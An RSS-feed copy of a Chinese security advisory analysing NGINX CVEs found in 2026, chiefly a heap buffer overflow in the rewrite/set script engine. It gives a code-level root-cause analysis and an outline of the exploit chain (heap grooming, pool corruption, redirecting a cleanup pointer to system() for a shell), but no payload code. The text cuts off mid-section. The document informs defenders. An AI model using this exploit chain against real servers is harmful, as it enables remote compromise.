<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=495364bd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518815%26idx%3D1%26sn%3Dbc9a60ac5943fb9a8e839c9be78483f8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 15 May 2026 10:30:00 +0800</pubDate>
    </item>
    <item>
      <title>18年积弊：NGINX脚本引擎堆缓冲区溢出可致远程代码执行</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518823&amp;idx=1&amp;sn=19eb60f4cf7cf69c3c853406cadaa97f</link>
      <description>2026年初，安全研究组织depthfirst通过其自动化代码审计系统对NGINX源代码进行深度扫描，识别出五个安全缺陷，其中四个已获得NGINX官方确认并分配CVE编号。这一发现揭示了NGINX核心组件中存在的严重内存损坏问题，攻击者可利用这些漏洞实现远程代码执行</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-05-14 18:27</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=51c9d649&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicdFSPctQMq5ZuCiax33H2BcC3jibknwDsHfa816eyLibThrBclG8z258iaVbwicpG25DYAhr1Voqr4KQkY6bRzNStWTaAS3hRobR98%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年初，安全研究组织depthfirst通过其自动化代码审计系统对NGINX源代码进行深度扫描，识别出五个安全缺陷，其中四个已获得NGINX官方确认并分配CVE编号。这一发现揭示了NGINX核心组件中存在的严重内存损坏问题，攻击者可利用这些漏洞实现远程代码执行</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">漏洞概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2026年初，安全研究组织depthfirst通过其自动化代码审计系统对NGINX源代码进行深度扫描，在六小时内识别出五个安全缺陷，其中四个已获得NGINX官方确认并分配CVE编号。这一发现揭示了NGINX核心组件中存在的严重内存损坏问题，攻击者可利用这些漏洞实现远程代码执行。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关键CVE清单：</span></strong></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">CVE编号</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">严重性</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">漏洞类型</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">影响组件</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42945</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Critical (9.2)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">堆缓冲区溢出</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_rewrite_module</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42946</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">High (8.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">过度内存分配</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_scgi_module, ngx_http_uwsgi_module</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-40701</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Medium (6.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">释放后使用</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_ssl_module</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42934</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Medium (6.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">越界读取</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_charset_module</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-42945作为该批次中最严重的漏洞，CVSS评分高达9.2，漏洞代码于2008年引入，跨越近18年未被发觉，影响范围覆盖NGINX Open Source 0.6.27至1.30.0版本以及NGINX Plus R32至R36版本。该漏洞的利用门槛较低，在禁用ASLR的环境中已验证可实现可靠的远程代码执行。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术根因分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">脚本引擎两遍处理机制</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">NGINX配置中的rewrite指令和set指令是构建API网关和请求路由的核心组件。rewrite指令允许通过正则表达式修改请求URI，当替换字符串包含问号时，NGINX将问号后的内容作为查询字符串处理。set指令则用于将值赋给自定义变量，支持捕获组的引用，这两个指令的组合使用极为普遍。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">NGINX内部通过脚本引擎（script engine）优化这些操作。在配置解析阶段，脚本引擎将这些指令编译为操作序列；在运行时，通过两遍（two-pass）机制执行：首先计算最终字符串的总长度，从内存池分配精确大小的缓冲区；随后执行复制操作将实际数据写入新分配的缓冲区。这种设计避免了多次小额内存分配的性能开销，但要求两遍之间的引擎状态保持一致。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">is_args标志传播失效</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞根因位于</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">src/http/ngx_http_script.c</span></code><span leaf="">。当rewrite指令的替换字符串包含问号时，函数</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_http_script_start_args_code</span></code><span leaf="">会将主引擎的</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">e-&gt;is_args</span></code><span leaf="">标志设置为1：</span></p><pre style="overflow-wrap: break-word;word-break: break-all;white-space: pre-wrap;max-width: 100%;color: rgb(43, 48, 59);font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">void ngx_http_script_start_args_code(ngx_http_script_engine_t *e) {</span><span leaf=""><br/></span><span leaf="">    e-&gt;is_args = 1;</span><span leaf=""><br/></span><span leaf="">    e-&gt;args = e-&gt;pos;</span><span leaf=""><br/></span><span leaf="">    e-&gt;ip += sizeof(uintptr_t);</span><span leaf=""><br/></span><span leaf="">}</span></code></pre><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该标志在后续处理中</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">从未被重置</span></strong><span leaf="">。当后续的set指令引用正则捕获组时，触发</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_http_script_complex_value_code</span></code><span leaf="">函数执行长度计算。此时，该函数创建一个</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">完全清零的子引擎</span></strong><span leaf="">：</span></p><pre style="overflow-wrap: break-word;word-break: break-all;white-space: pre-wrap;max-width: 100%;color: rgb(43, 48, 59);font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">void ngx_http_script_complex_value_code(ngx_http_script_engine_t *e) {</span><span leaf=""><br/></span><span leaf="">    ngx_http_script_engine_t le;</span><span leaf=""><br/></span><span leaf="">    ngx_memzero(&amp;le, sizeof(ngx_http_script_engine_t));</span><span leaf=""><br/></span><span leaf="">    le.ip = code-&gt;lengths-&gt;elts;</span><span leaf=""><br/></span><span leaf="">    // ...</span><span leaf=""><br/></span><span leaf="">}</span></code></pre><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">由于子引擎被初始化为全零，</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">le.is_args</span></code><span leaf="">为0。长度计算函数</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_http_script_copy_capture_len_code</span></code><span leaf="">据此判断不需要进行URL转义，计算出的长度是原始捕获字节数。然而在实际复制阶段，主引擎的</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">e-&gt;is_args</span></code><span leaf="">仍为1，复制函数调用</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_escape_uri</span></code><span leaf="">进行URL转义，每个可转义字节扩展为3字节（%XX格式）。</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">长度计算与实际写入数据量之间的不匹配，导致堆缓冲区溢出。</span></strong></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击向量与利用链</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞触发需要同时满足两个条件：rewrite指令的替换字符串包含问号，且后续存在引用捕获组的set指令。攻击者可通过构造恶意请求路径，利用截断的正则表达式捕获未转义的路径字符。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">depthfirst已公开完整的概念验证代码，验证了以下攻击路径：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">攻击者通过跨请求堆风水（heap feng shui）技术操控堆布局</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">利用POST body喷洒（spraying）破坏相邻的</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_pool_t</span></code><span leaf="">结构</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">将cleanup指针重定向至伪造的</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">ngx_pool_cleanup_s</span></code><span leaf="">结构</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在内存池销毁时触发system()调用，获得远程shell 在Ubuntu 24.04.3 LTS环境中，该概念验证代码已验证可行。</span></span></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">其他关联漏洞</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-42946：SCGI/UWSGI模块过度内存分配</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">SCGI和UWSGI模块在解析上游状态行时存在状态不匹配问题。当状态行读取不完整时，跨缓冲区的指针减法运算产生约1TB的键长度，导致worker进程崩溃。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 